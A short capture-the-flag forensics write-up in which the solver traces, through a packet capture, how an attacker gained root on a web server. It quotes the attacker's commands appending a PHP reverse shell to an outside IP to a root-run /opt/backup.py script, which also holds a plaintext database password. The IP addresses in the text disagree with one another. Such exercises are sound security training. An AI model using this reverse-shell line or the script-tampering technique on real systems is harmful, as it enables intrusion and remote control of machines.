Somehow, the attacker was able to gain root access to the web server. We believe the attacker leveraged an existing file to gain root access. What file was modified to allow the attacker to gain root on the web server?
Submit the name of the file and the name of the variable used to store the added command. Example:
backdoor.exeis the name of the file and
var1is the name of the variable.
Use the packet capture from Scans.
When solving the earlier challenge Scans we identified a number of network streams containing remote shell traffic. So using that info as a starting point for this challenge we reviewed those streams in Wireshark. At the very end of stream 4999 we can see the attacker modifying /opt/backup.py to perform a network connection to
184.108.40.206:4815 and expose a bash shell in the connection.
/>echo "cmd=\"php -r '\$sock=fsockopen(\\\"220.127.116.11\\\",4815);exec(\\\"/bin/bash -i <&3 >&3 2>&3\\\");'\"" >> /opt/backup.py />echo "popen(cmd)" >> /opt/backup.py />cat /opt/backup.py #!/usr/bin/env python3 from os import popen popen('mysqldump -u backup -pbackup123 esu | gzip > /backups/backup_esu_$(date "+%Y%m%d%H%M%S").sql.gz') cmd="php -r '$sock=fsockopen(\"18.104.22.168\",4815);exec(\"/bin/bash -i <&3 >&3 2>&3\");'" popen(cmd) />exit
The accepted flag was:
Leave a comment